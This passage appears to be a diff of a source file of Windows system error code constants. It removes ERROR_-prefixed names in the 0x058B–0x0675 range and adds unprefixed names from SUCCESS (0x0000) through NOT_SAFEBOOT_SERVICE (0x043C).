0x058B - ERROR_WINDOW_NOT_DIALOG = 0x058C - ERROR_CONTROL_ID_NOT_FOUND = 0x058D - ERROR_INVALID_COMBOBOX_MESSAGE = 0x058E - ERROR_WINDOW_NOT_COMBOBOX = 0x058F - ERROR_INVALID_EDIT_HEIGHT = 0x0590 - ERROR_DC_NOT_FOUND = 0x0591 - ERROR_INVALID_HOOK_FILTER = 0x0592 - ERROR_INVALID_FILTER_PROC = 0x0593 - ERROR_HOOK_NEEDS_HMOD = 0x0594 - ERROR_GLOBAL_ONLY_HOOK = 0x0595 - ERROR_JOURNAL_HOOK_SET = 0x0596 - ERROR_HOOK_NOT_INSTALLED = 0x0597 - ERROR_INVALID_LB_MESSAGE = 0x0598 - ERROR_SETCOUNT_ON_BAD_LB = 0x0599 - ERROR_LB_WITHOUT_TABSTOPS = 0x059A - ERROR_DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B - ERROR_CHILD_WINDOW_MENU = 0x059C - ERROR_NO_SYSTEM_MENU = 0x059D - ERROR_INVALID_MSGBOX_STYLE = 0x059E - ERROR_INVALID_SPI_VALUE = 0x059F - ERROR_SCREEN_ALREADY_LOCKED = 0x05A0 - ERROR_HWNDS_HAVE_DIFF_PARENT = 0x05A1 - ERROR_NOT_CHILD_WINDOW = 0x05A2 - ERROR_INVALID_GW_COMMAND = 0x05A3 - ERROR_INVALID_THREAD_ID = 0x05A4 - ERROR_NON_MDICHILD_WINDOW = 0x05A5 - ERROR_POPUP_ALREADY_ACTIVE = 0x05A6 - ERROR_NO_SCROLLBARS = 0x05A7 - ERROR_INVALID_SCROLLBAR_RANGE = 0x05A8 - ERROR_INVALID_SHOWWIN_COMMAND = 0x05A9 - ERROR_NO_SYSTEM_RESOURCES = 0x05AA - ERROR_NONPAGED_SYSTEM_RESOURCES = 0x05AB - ERROR_PAGED_SYSTEM_RESOURCES = 0x05AC - ERROR_WORKING_SET_QUOTA = 0x05AD - ERROR_PAGEFILE_QUOTA = 0x05AE - ERROR_COMMITMENT_LIMIT = 0x05AF - ERROR_MENU_ITEM_NOT_FOUND = 0x05B0 - ERROR_INVALID_KEYBOARD_HANDLE = 0x05B1 - ERROR_HOOK_TYPE_NOT_ALLOWED = 0x05B2 - ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 - ERROR_TIMEOUT = 0x05B4 - ERROR_INVALID_MONITOR_HANDLE = 0x05B5 - ERROR_INCORRECT_SIZE = 0x05B6 - ERROR_SYMLINK_CLASS_DISABLED = 0x05B7 - ERROR_SYMLINK_NOT_SUPPORTED = 0x05B8 - ERROR_XML_PARSE_ERROR = 0x05B9 - ERROR_XMLDSIG_ERROR = 0x05BA - ERROR_RESTART_APPLICATION = 0x05BB - ERROR_WRONG_COMPARTMENT = 0x05BC - ERROR_AUTHIP_FAILURE = 0x05BD - ERROR_NO_NVRAM_RESOURCES = 0x05BE - ERROR_EVENTLOG_FILE_CORRUPT = 0x05DC - ERROR_EVENTLOG_CANT_START = 0x05DD - ERROR_LOG_FILE_FULL = 0x05DE - ERROR_EVENTLOG_FILE_CHANGED = 0x05DF - ERROR_INVALID_TASK_NAME = 0x060E - ERROR_INVALID_TASK_INDEX = 0x060F - ERROR_THREAD_ALREADY_IN_TASK = 0x0610 - ERROR_INSTALL_SERVICE_FAILURE = 0x0641 - ERROR_INSTALL_USEREXIT = 0x0642 - ERROR_INSTALL_FAILURE = 0x0643 - ERROR_INSTALL_SUSPEND = 0x0644 - ERROR_UNKNOWN_PRODUCT = 0x0645 - ERROR_UNKNOWN_FEATURE = 0x0646 - ERROR_UNKNOWN_COMPONENT = 0x0647 - ERROR_UNKNOWN_PROPERTY = 0x0648 - ERROR_INVALID_HANDLE_STATE = 0x0649 - ERROR_BAD_CONFIGURATION = 0x064A - ERROR_INDEX_ABSENT = 0x064B - ERROR_INSTALL_SOURCE_ABSENT = 0x064C - ERROR_INSTALL_PACKAGE_VERSION = 0x064D - ERROR_PRODUCT_UNINSTALLED = 0x064E - ERROR_BAD_QUERY_SYNTAX = 0x064F - ERROR_INVALID_FIELD = 0x0650 - ERROR_DEVICE_REMOVED = 0x0651 - ERROR_INSTALL_ALREADY_RUNNING = 0x0652 - ERROR_INSTALL_PACKAGE_OPEN_FAILED = 0x0653 - ERROR_INSTALL_PACKAGE_INVALID = 0x0654 - ERROR_INSTALL_UI_FAILURE = 0x0655 - ERROR_INSTALL_LOG_FAILURE = 0x0656 - ERROR_INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 - ERROR_INSTALL_TRANSFORM_FAILURE = 0x0658 - ERROR_INSTALL_PACKAGE_REJECTED = 0x0659 - ERROR_FUNCTION_NOT_CALLED = 0x065A - ERROR_FUNCTION_FAILED = 0x065B - ERROR_INVALID_TABLE = 0x065C - ERROR_DATATYPE_MISMATCH = 0x065D - ERROR_UNSUPPORTED_TYPE = 0x065E - ERROR_CREATE_FAILED = 0x065F - ERROR_INSTALL_TEMP_UNWRITABLE = 0x0660 - ERROR_INSTALL_PLATFORM_UNSUPPORTED = 0x0661 - ERROR_INSTALL_NOTUSED = 0x0662 - ERROR_PATCH_PACKAGE_OPEN_FAILED = 0x0663 - ERROR_PATCH_PACKAGE_INVALID = 0x0664 - ERROR_PATCH_PACKAGE_UNSUPPORTED = 0x0665 - ERROR_PRODUCT_VERSION = 0x0666 - ERROR_INVALID_COMMAND_LINE = 0x0667 - ERROR_INSTALL_REMOTE_DISALLOWED = 0x0668 - ERROR_SUCCESS_REBOOT_INITIATED = 0x0669 - ERROR_PATCH_TARGET_NOT_FOUND = 0x066A - ERROR_PATCH_PACKAGE_REJECTED = 0x066B - ERROR_INSTALL_TRANSFORM_REJECTED = 0x066C - ERROR_INSTALL_REMOTE_PROHIBITED = 0x066D - ERROR_PATCH_REMOVAL_UNSUPPORTED = 0x066E - ERROR_UNKNOWN_PATCH = 0x066F - ERROR_PATCH_NO_SEQUENCE = 0x0670 - ERROR_PATCH_REMOVAL_DISALLOWED = 0x0671 - ERROR_INVALID_PATCH_XML = 0x0672 - ERROR_PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 - ERROR_INSTALL_SERVICE_SAFEBOOT = 0x0674 - ERROR_FAIL_FAST_EXCEPTION = 0x0675 + SUCCESS = 0x0000 + INVALID_FUNCTION = 0x0001 + FILE_NOT_FOUND = 0x0002 + PATH_NOT_FOUND = 0x0003 + TOO_MANY_OPEN_FILES = 0x0004 + ACCESS_DENIED = 0x0005 + INVALID_HANDLE = 0x0006 + ARENA_TRASHED = 0x0007 + NOT_ENOUGH_MEMORY = 0x0008 + INVALID_BLOCK = 0x0009 + BAD_ENVIRONMENT = 0x000A + BAD_FORMAT = 0x000B + INVALID_ACCESS = 0x000C + INVALID_DATA = 0x000D + OUTOFMEMORY = 0x000E + INVALID_DRIVE = 0x000F + CURRENT_DIRECTORY = 0x0010 + NOT_SAME_DEVICE = 0x0011 + NO_MORE_FILES = 0x0012 + WRITE_PROTECT = 0x0013 + BAD_UNIT = 0x0014 + NOT_READY = 0x0015 + BAD_COMMAND = 0x0016 + CRC = 0x0017 + BAD_LENGTH = 0x0018 + SEEK = 0x0019 + NOT_DOS_DISK = 0x001A + SECTOR_NOT_FOUND = 0x001B + OUT_OF_PAPER = 0x001C + WRITE_FAULT = 0x001D + READ_FAULT = 0x001E + GEN_FAILURE = 0x001F + SHARING_VIOLATION = 0x0020 + LOCK_VIOLATION = 0x0021 + WRONG_DISK = 0x0022 + SHARING_BUFFER_EXCEEDED = 0x0024 + HANDLE_EOF = 0x0026 + HANDLE_DISK_FULL = 0x0027 + NOT_SUPPORTED = 0x0032 + REM_NOT_LIST = 0x0033 + DUP_NAME = 0x0034 + BAD_NETPATH = 0x0035 + NETWORK_BUSY = 0x0036 + DEV_NOT_EXIST = 0x0037 + TOO_MANY_CMDS = 0x0038 + ADAP_HDW_ERR = 0x0039 + BAD_NET_RESP = 0x003A + UNEXP_NET_ERR = 0x003B + BAD_REM_ADAP = 0x003C + PRINTQ_FULL = 0x003D + NO_SPOOL_SPACE = 0x003E + PRINT_CANCELLED = 0x003F + NETNAME_DELETED = 0x0040 + NETWORK_ACCESS_DENIED = 0x0041 + BAD_DEV_TYPE = 0x0042 + BAD_NET_NAME = 0x0043 + TOO_MANY_NAMES = 0x0044 + TOO_MANY_SESS = 0x0045 + SHARING_PAUSED = 0x0046 + REQ_NOT_ACCEP = 0x0047 + REDIR_PAUSED = 0x0048 + FILE_EXISTS = 0x0050 + CANNOT_MAKE = 0x0052 + FAIL_I24 = 0x0053 + OUT_OF_STRUCTURES = 0x0054 + ALREADY_ASSIGNED = 0x0055 + INVALID_PASSWORD = 0x0056 + INVALID_PARAMETER = 0x0057 + NET_WRITE_FAULT = 0x0058 + NO_PROC_SLOTS = 0x0059 + TOO_MANY_SEMAPHORES = 0x0064 + EXCL_SEM_ALREADY_OWNED = 0x0065 + SEM_IS_SET = 0x0066 + TOO_MANY_SEM_REQUESTS = 0x0067 + INVALID_AT_INTERRUPT_TIME = 0x0068 + SEM_OWNER_DIED = 0x0069 + SEM_USER_LIMIT = 0x006A + DISK_CHANGE = 0x006B + DRIVE_LOCKED = 0x006C + BROKEN_PIPE = 0x006D + OPEN_FAILED = 0x006E + BUFFER_OVERFLOW = 0x006F + DISK_FULL = 0x0070 + NO_MORE_SEARCH_HANDLES = 0x0071 + INVALID_TARGET_HANDLE = 0x0072 + INVALID_CATEGORY = 0x0075 + INVALID_VERIFY_SWITCH = 0x0076 + BAD_DRIVER_LEVEL = 0x0077 + CALL_NOT_IMPLEMENTED = 0x0078 + SEM_TIMEOUT = 0x0079 + INSUFFICIENT_BUFFER = 0x007A + INVALID_NAME = 0x007B + INVALID_LEVEL = 0x007C + NO_VOLUME_LABEL = 0x007D + MOD_NOT_FOUND = 0x007E + PROC_NOT_FOUND = 0x007F + WAIT_NO_CHILDREN = 0x0080 + CHILD_NOT_COMPLETE = 0x0081 + DIRECT_ACCESS_HANDLE = 0x0082 + NEGATIVE_SEEK = 0x0083 + SEEK_ON_DEVICE = 0x0084 + IS_JOIN_TARGET = 0x0085 + IS_JOINED = 0x0086 + IS_SUBSTED = 0x0087 + NOT_JOINED = 0x0088 + NOT_SUBSTED = 0x0089 + JOIN_TO_JOIN = 0x008A + SUBST_TO_SUBST = 0x008B + JOIN_TO_SUBST = 0x008C + SUBST_TO_JOIN = 0x008D + BUSY_DRIVE = 0x008E + SAME_DRIVE = 0x008F + DIR_NOT_ROOT = 0x0090 + DIR_NOT_EMPTY = 0x0091 + IS_SUBST_PATH = 0x0092 + IS_JOIN_PATH = 0x0093 + PATH_BUSY = 0x0094 + IS_SUBST_TARGET = 0x0095 + SYSTEM_TRACE = 0x0096 + INVALID_EVENT_COUNT = 0x0097 + TOO_MANY_MUXWAITERS = 0x0098 + INVALID_LIST_FORMAT = 0x0099 + LABEL_TOO_LONG = 0x009A + TOO_MANY_TCBS = 0x009B + SIGNAL_REFUSED = 0x009C + DISCARDED = 0x009D + NOT_LOCKED = 0x009E + BAD_THREADID_ADDR = 0x009F + BAD_ARGUMENTS = 0x00A0 + BAD_PATHNAME = 0x00A1 + SIGNAL_PENDING = 0x00A2 + MAX_THRDS_REACHED = 0x00A4 + LOCK_FAILED = 0x00A7 + BUSY = 0x00AA + CANCEL_VIOLATION = 0x00AD + ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE + INVALID_SEGMENT_NUMBER = 0x00B4 + INVALID_ORDINAL = 0x00B6 + ALREADY_EXISTS = 0x00B7 + INVALID_FLAG_NUMBER = 0x00BA + SEM_NOT_FOUND = 0x00BB + INVALID_STARTING_CODESEG = 0x00BC + INVALID_STACKSEG = 0x00BD + INVALID_MODULETYPE = 0x00BE + INVALID_EXE_SIGNATURE = 0x00BF + EXE_MARKED_INVALID = 0x00C0 + BAD_EXE_FORMAT = 0x00C1 + ITERATED_DATA_EXCEEDS_64k = 0x00C2 + INVALID_MINALLOCSIZE = 0x00C3 + DYNLINK_FROM_INVALID_RING = 0x00C4 + IOPL_NOT_ENABLED = 0x00C5 + INVALID_SEGDPL = 0x00C6 + AUTODATASEG_EXCEEDS_64k = 0x00C7 + RING2SEG_MUST_BE_MOVABLE = 0x00C8 + RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 + INFLOOP_IN_RELOC_CHAIN = 0x00CA + ENVVAR_NOT_FOUND = 0x00CB + NO_SIGNAL_SENT = 0x00CD + FILENAME_EXCED_RANGE = 0x00CE + RING2_STACK_IN_USE = 0x00CF + META_EXPANSION_TOO_LONG = 0x00D0 + INVALID_SIGNAL_NUMBER = 0x00D1 + THREAD_1_INACTIVE = 0x00D2 + LOCKED = 0x00D4 + TOO_MANY_MODULES = 0x00D6 + NESTING_NOT_ALLOWED = 0x00D7 + EXE_MACHINE_TYPE_MISMATCH = 0x00D8 + EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 + EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA + FILE_CHECKED_OUT = 0x00DC + CHECKOUT_REQUIRED = 0x00DD + BAD_FILE_TYPE = 0x00DE + FILE_TOO_LARGE = 0x00DF + FORMS_AUTH_REQUIRED = 0x00E0 + VIRUS_INFECTED = 0x00E1 + VIRUS_DELETED = 0x00E2 + PIPE_LOCAL = 0x00E5 + BAD_PIPE = 0x00E6 + PIPE_BUSY = 0x00E7 + NO_DATA = 0x00E8 + PIPE_NOT_CONNECTED = 0x00E9 + MORE_DATA = 0x00EA + VC_DISCONNECTED = 0x00F0 + INVALID_EA_NAME = 0x00FE + EA_LIST_INCONSISTENT = 0x00FF + WAIT_TIMEOUT = 0x0102 + NO_MORE_ITEMS = 0x0103 + CANNOT_COPY = 0x010A + DIRECTORY = 0x010B + EAS_DIDNT_FIT = 0x0113 + EA_FILE_CORRUPT = 0x0114 + EA_TABLE_FULL = 0x0115 + INVALID_EA_HANDLE = 0x0116 + EAS_NOT_SUPPORTED = 0x011A + NOT_OWNER = 0x0120 + TOO_MANY_POSTS = 0x012A + PARTIAL_COPY = 0x012B + OPLOCK_NOT_GRANTED = 0x012C + INVALID_OPLOCK_PROTOCOL = 0x012D + DISK_TOO_FRAGMENTED = 0x012E + DELETE_PENDING = 0x012F + INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 + SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 + SECURITY_STREAM_IS_INCONSISTENT = 0x0132 + INVALID_LOCK_RANGE = 0x0133 + IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 + NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 + MR_MID_NOT_FOUND = 0x013D + SCOPE_NOT_FOUND = 0x013E + FAIL_NOACTION_REBOOT = 0x015E + FAIL_SHUTDOWN = 0x015F + FAIL_RESTART = 0x0160 + MAX_SESSIONS_REACHED = 0x0161 + THREAD_MODE_ALREADY_BACKGROUND = 0x0190 + THREAD_MODE_NOT_BACKGROUND = 0x0191 + PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 + PROCESS_MODE_NOT_BACKGROUND = 0x0193 + INVALID_ADDRESS = 0x01E7 + USER_PROFILE_LOAD = 0x01F4 + ARITHMETIC_OVERFLOW = 0x0216 + PIPE_CONNECTED = 0x0217 + PIPE_LISTENING = 0x0218 + VERIFIER_STOP = 0x0219 + ABIOS_ERROR = 0x021A + WX86_WARNING = 0x021B + WX86_ERROR = 0x021C + TIMER_NOT_CANCELED = 0x021D + UNWIND = 0x021E + BAD_STACK = 0x021F + INVALID_UNWIND_TARGET = 0x0220 + INVALID_PORT_ATTRIBUTES = 0x0221 + PORT_MESSAGE_TOO_LONG = 0x0222 + INVALID_QUOTA_LOWER = 0x0223 + DEVICE_ALREADY_ATTACHED = 0x0224 + INSTRUCTION_MISALIGNMENT = 0x0225 + PROFILING_NOT_STARTED = 0x0226 + PROFILING_NOT_STOPPED = 0x0227 + COULD_NOT_INTERPRET = 0x0228 + PROFILING_AT_LIMIT = 0x0229 + CANT_WAIT = 0x022A + CANT_TERMINATE_SELF = 0x022B + UNEXPECTED_MM_CREATE_ERR = 0x022C + UNEXPECTED_MM_MAP_ERROR = 0x022D + UNEXPECTED_MM_EXTEND_ERR = 0x022E + BAD_FUNCTION_TABLE = 0x022F + NO_GUID_TRANSLATION = 0x0230 + INVALID_LDT_SIZE = 0x0231 + INVALID_LDT_OFFSET = 0x0233 + INVALID_LDT_DESCRIPTOR = 0x0234 + TOO_MANY_THREADS = 0x0235 + THREAD_NOT_IN_PROCESS = 0x0236 + PAGEFILE_QUOTA_EXCEEDED = 0x0237 + LOGON_SERVER_CONFLICT = 0x0238 + SYNCHRONIZATION_REQUIRED = 0x0239 + NET_OPEN_FAILED = 0x023A + IO_PRIVILEGE_FAILED = 0x023B + CONTROL_C_EXIT = 0x023C + MISSING_SYSTEMFILE = 0x023D + UNHANDLED_EXCEPTION = 0x023E + APP_INIT_FAILURE = 0x023F + PAGEFILE_CREATE_FAILED = 0x0240 + INVALID_IMAGE_HASH = 0x0241 + NO_PAGEFILE = 0x0242 + ILLEGAL_FLOAT_CONTEXT = 0x0243 + NO_EVENT_PAIR = 0x0244 + DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 + ILLEGAL_CHARACTER = 0x0246 + UNDEFINED_CHARACTER = 0x0247 + FLOPPY_VOLUME = 0x0248 + BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 + BACKUP_CONTROLLER = 0x024A + MUTANT_LIMIT_EXCEEDED = 0x024B + FS_DRIVER_REQUIRED = 0x024C + CANNOT_LOAD_REGISTRY_FILE = 0x024D + DEBUG_ATTACH_FAILED = 0x024E + SYSTEM_PROCESS_TERMINATED = 0x024F + DATA_NOT_ACCEPTED = 0x0250 + VDM_HARD_ERROR = 0x0251 + DRIVER_CANCEL_TIMEOUT = 0x0252 + REPLY_MESSAGE_MISMATCH = 0x0253 + LOST_WRITEBEHIND_DATA = 0x0254 + CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 + NOT_TINY_STREAM = 0x0256 + STACK_OVERFLOW_READ = 0x0257 + CONVERT_TO_LARGE = 0x0258 + FOUND_OUT_OF_SCOPE = 0x0259 + ALLOCATE_BUCKET = 0x025A + MARSHALL_OVERFLOW = 0x025B + INVALID_VARIANT = 0x025C + BAD_COMPRESSION_BUFFER = 0x025D + AUDIT_FAILED = 0x025E + TIMER_RESOLUTION_NOT_SET = 0x025F + INSUFFICIENT_LOGON_INFO = 0x0260 + BAD_DLL_ENTRYPOINT = 0x0261 + BAD_SERVICE_ENTRYPOINT = 0x0262 + IP_ADDRESS_CONFLICT1 = 0x0263 + IP_ADDRESS_CONFLICT2 = 0x0264 + REGISTRY_QUOTA_LIMIT = 0x0265 + NO_CALLBACK_ACTIVE = 0x0266 + PWD_TOO_SHORT = 0x0267 + PWD_TOO_RECENT = 0x0268 + PWD_HISTORY_CONFLICT = 0x0269 + UNSUPPORTED_COMPRESSION = 0x026A + INVALID_HW_PROFILE = 0x026B + INVALID_PLUGPLAY_DEVICE_PATH = 0x026C + QUOTA_LIST_INCONSISTENT = 0x026D + EVALUATION_EXPIRATION = 0x026E + ILLEGAL_DLL_RELOCATION = 0x026F + DLL_INIT_FAILED_LOGOFF = 0x0270 + VALIDATE_CONTINUE = 0x0271 + NO_MORE_MATCHES = 0x0272 + RANGE_LIST_CONFLICT = 0x0273 + SERVER_SID_MISMATCH = 0x0274 + CANT_ENABLE_DENY_ONLY = 0x0275 + FLOAT_MULTIPLE_FAULTS = 0x0276 + FLOAT_MULTIPLE_TRAPS = 0x0277 + NOINTERFACE = 0x0278 + DRIVER_FAILED_SLEEP = 0x0279 + CORRUPT_SYSTEM_FILE = 0x027A + COMMITMENT_MINIMUM = 0x027B + PNP_RESTART_ENUMERATION = 0x027C + SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D + PNP_REBOOT_REQUIRED = 0x027E + INSUFFICIENT_POWER = 0x027F + MULTIPLE_FAULT_VIOLATION = 0x0280 + SYSTEM_SHUTDOWN = 0x0281 + PORT_NOT_SET = 0x0282 + DS_VERSION_CHECK_FAILURE = 0x0283 + RANGE_NOT_FOUND = 0x0284 + NOT_SAFE_MODE_DRIVER = 0x0286 + FAILED_DRIVER_ENTRY = 0x0287 + DEVICE_ENUMERATION_ERROR = 0x0288 + MOUNT_POINT_NOT_RESOLVED = 0x0289 + INVALID_DEVICE_OBJECT_PARAMETER = 0x028A + MCA_OCCURED = 0x028B + DRIVER_DATABASE_ERROR = 0x028C + SYSTEM_HIVE_TOO_LARGE = 0x028D + DRIVER_FAILED_PRIOR_UNLOAD = 0x028E + VOLSNAP_PREPARE_HIBERNATE = 0x028F + HIBERNATION_FAILURE = 0x0290 + FILE_SYSTEM_LIMITATION = 0x0299 + ASSERTION_FAILURE = 0x029C + ACPI_ERROR = 0x029D + WOW_ASSERTION = 0x029E + PNP_BAD_MPS_TABLE = 0x029F + PNP_TRANSLATION_FAILED = 0x02A0 + PNP_IRQ_TRANSLATION_FAILED = 0x02A1 + PNP_INVALID_ID = 0x02A2 + WAKE_SYSTEM_DEBUGGER = 0x02A3 + HANDLES_CLOSED = 0x02A4 + EXTRANEOUS_INFORMATION = 0x02A5 + RXACT_COMMIT_NECESSARY = 0x02A6 + MEDIA_CHECK = 0x02A7 + GUID_SUBSTITUTION_MADE = 0x02A8 + STOPPED_ON_SYMLINK = 0x02A9 + LONGJUMP = 0x02AA + PLUGPLAY_QUERY_VETOED = 0x02AB + UNWIND_CONSOLIDATE = 0x02AC + REGISTRY_HIVE_RECOVERED = 0x02AD + DLL_MIGHT_BE_INSECURE = 0x02AE + DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF + DBG_EXCEPTION_NOT_HANDLED = 0x02B0 + DBG_REPLY_LATER = 0x02B1 + DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 + DBG_TERMINATE_THREAD = 0x02B3 + DBG_TERMINATE_PROCESS = 0x02B4 + DBG_CONTROL_C = 0x02B5 + DBG_PRINTEXCEPTION_C = 0x02B6 + DBG_RIPEXCEPTION = 0x02B7 + DBG_CONTROL_BREAK = 0x02B8 + DBG_COMMAND_EXCEPTION = 0x02B9 + OBJECT_NAME_EXISTS = 0x02BA + THREAD_WAS_SUSPENDED = 0x02BB + IMAGE_NOT_AT_BASE = 0x02BC + RXACT_STATE_CREATED = 0x02BD + SEGMENT_NOTIFICATION = 0x02BE + BAD_CURRENT_DIRECTORY = 0x02BF + FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 + FT_WRITE_RECOVERY = 0x02C1 + IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 + RECEIVE_PARTIAL = 0x02C3 + RECEIVE_EXPEDITED = 0x02C4 + RECEIVE_PARTIAL_EXPEDITED = 0x02C5 + EVENT_DONE = 0x02C6 + EVENT_PENDING = 0x02C7 + CHECKING_FILE_SYSTEM = 0x02C8 + FATAL_APP_EXIT = 0x02C9 + PREDEFINED_HANDLE = 0x02CA + WAS_UNLOCKED = 0x02CB + SERVICE_NOTIFICATION = 0x02CC + WAS_LOCKED = 0x02CD + LOG_HARD_ERROR = 0x02CE + ALREADY_WIN32 = 0x02CF + IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 + NO_YIELD_PERFORMED = 0x02D1 + TIMER_RESUME_IGNORED = 0x02D2 + ARBITRATION_UNHANDLED = 0x02D3 + CARDBUS_NOT_SUPPORTED = 0x02D4 + MP_PROCESSOR_MISMATCH = 0x02D5 + HIBERNATED = 0x02D6 + RESUME_HIBERNATION = 0x02D7 + FIRMWARE_UPDATED = 0x02D8 + DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 + WAKE_SYSTEM = 0x02DA + WAIT_1 = 0x02DB + WAIT_2 = 0x02DC + WAIT_3 = 0x02DD + WAIT_63 = 0x02DE + ABANDONED_WAIT_0 = 0x02DF + ABANDONED_WAIT_63 = 0x02E0 + USER_APC = 0x02E1 + KERNEL_APC = 0x02E2 + ALERTED = 0x02E3 + ELEVATION_REQUIRED = 0x02E4 + REPARSE = 0x02E5 + OPLOCK_BREAK_IN_PROGRESS = 0x02E6 + VOLUME_MOUNTED = 0x02E7 + RXACT_COMMITTED = 0x02E8 + NOTIFY_CLEANUP = 0x02E9 + PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA + PAGE_FAULT_TRANSITION = 0x02EB + PAGE_FAULT_DEMAND_ZERO = 0x02EC + PAGE_FAULT_COPY_ON_WRITE = 0x02ED + PAGE_FAULT_GUARD_PAGE = 0x02EE + PAGE_FAULT_PAGING_FILE = 0x02EF + CACHE_PAGE_LOCKED = 0x02F0 + CRASH_DUMP = 0x02F1 + BUFFER_ALL_ZEROS = 0x02F2 + REPARSE_OBJECT = 0x02F3 + RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 + TRANSLATION_COMPLETE = 0x02F5 + NOTHING_TO_TERMINATE = 0x02F6 + PROCESS_NOT_IN_JOB = 0x02F7 + PROCESS_IN_JOB = 0x02F8 + VOLSNAP_HIBERNATE_READY = 0x02F9 + FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA + INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB + INTERRUPT_STILL_CONNECTED = 0x02FC + WAIT_FOR_OPLOCK = 0x02FD + DBG_EXCEPTION_HANDLED = 0x02FE + DBG_CONTINUE = 0x02FF + CALLBACK_POP_STACK = 0x0300 + COMPRESSION_DISABLED = 0x0301 + CANTFETCHBACKWARDS = 0x0302 + CANTSCROLLBACKWARDS = 0x0303 + ROWSNOTRELEASED = 0x0304 + BAD_ACCESSOR_FLAGS = 0x0305 + ERRORS_ENCOUNTERED = 0x0306 + NOT_CAPABLE = 0x0307 + REQUEST_OUT_OF_SEQUENCE = 0x0308 + VERSION_PARSE_ERROR = 0x0309 + BADSTARTPOSITION = 0x030A + MEMORY_HARDWARE = 0x030B + DISK_REPAIR_DISABLED = 0x030C + INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D + SYSTEM_POWERSTATE_TRANSITION = 0x030E + SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F + MCA_EXCEPTION = 0x0310 + ACCESS_AUDIT_BY_POLICY = 0x0311 + ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 + ABANDON_HIBERFILE = 0x0313 + LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 + LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 + LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 + BAD_MCFG_TABLE = 0x0317 + OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 + CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 + CANNOT_BREAK_OPLOCK = 0x0322 + OPLOCK_HANDLE_CLOSED = 0x0323 + NO_ACE_CONDITION = 0x0324 + INVALID_ACE_CONDITION = 0x0325 + EA_ACCESS_DENIED = 0x03E2 + OPERATION_ABORTED = 0x03E3 + IO_INCOMPLETE = 0x03E4 + IO_PENDING = 0x03E5 + NOACCESS = 0x03E6 + SWAPERROR = 0x03E7 + STACK_OVERFLOW = 0x03E9 + INVALID_MESSAGE = 0x03EA + CAN_NOT_COMPLETE = 0x03EB + INVALID_FLAGS = 0x03EC + UNRECOGNIZED_VOLUME = 0x03ED + FILE_INVALID = 0x03EE + FULLSCREEN_MODE = 0x03EF + NO_TOKEN = 0x03F0 + BADDB = 0x03F1 + BADKEY = 0x03F2 + CANTOPEN = 0x03F3 + CANTREAD = 0x03F4 + CANTWRITE = 0x03F5 + REGISTRY_RECOVERED = 0x03F6 + REGISTRY_CORRUPT = 0x03F7 + REGISTRY_IO_FAILED = 0x03F8 + NOT_REGISTRY_FILE = 0x03F9 + KEY_DELETED = 0x03FA + NO_LOG_SPACE = 0x03FB + KEY_HAS_CHILDREN = 0x03FC + CHILD_MUST_BE_VOLATILE = 0x03FD + NOTIFY_ENUM_DIR = 0x03FE + DEPENDENT_SERVICES_RUNNING = 0x041B + INVALID_SERVICE_CONTROL = 0x041C + SERVICE_REQUEST_TIMEOUT = 0x041D + SERVICE_NO_THREAD = 0x041E + SERVICE_DATABASE_LOCKED = 0x041F + SERVICE_ALREADY_RUNNING = 0x0420 + INVALID_SERVICE_ACCOUNT = 0x0421 + SERVICE_DISABLED = 0x0422 + CIRCULAR_DEPENDENCY = 0x0423 + SERVICE_DOES_NOT_EXIST = 0x0424 + SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 + SERVICE_NOT_ACTIVE = 0x0426 + FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 + EXCEPTION_IN_SERVICE = 0x0428 + DATABASE_DOES_NOT_EXIST = 0x0429 + SERVICE_SPECIFIC_ERROR = 0x042A + PROCESS_ABORTED = 0x042B + SERVICE_DEPENDENCY_FAIL = 0x042C + SERVICE_LOGON_FAILED = 0x042D + SERVICE_START_HANG = 0x042E + INVALID_SERVICE_LOCK = 0x042F + SERVICE_MARKED_FOR_DELETE = 0x0430 + SERVICE_EXISTS = 0x0431 + ALREADY_RUNNING_LKG = 0x0432 + SERVICE_DEPENDENCY_DELETED = 0x0433 + BOOT_ALREADY_ACCEPTED = 0x0434 + SERVICE_NEVER_STARTED = 0x0435 + DUPLICATE_SERVICE_NAME = 0x0436 + DIFFERENT_SERVICE_ACCOUNT = 0x0437 + CANNOT_DETECT_DRIVER_FAILURE = 0x0438 + CANNOT_DETECT_PROCESS_ABORT = 0x0439 + NO_RECOVERY_PROGRAM = 0x043A + SERVICE_NOT_IN_EXE = 0x043B + NOT_SAFEBOOT_SERVICE = 0x043C + 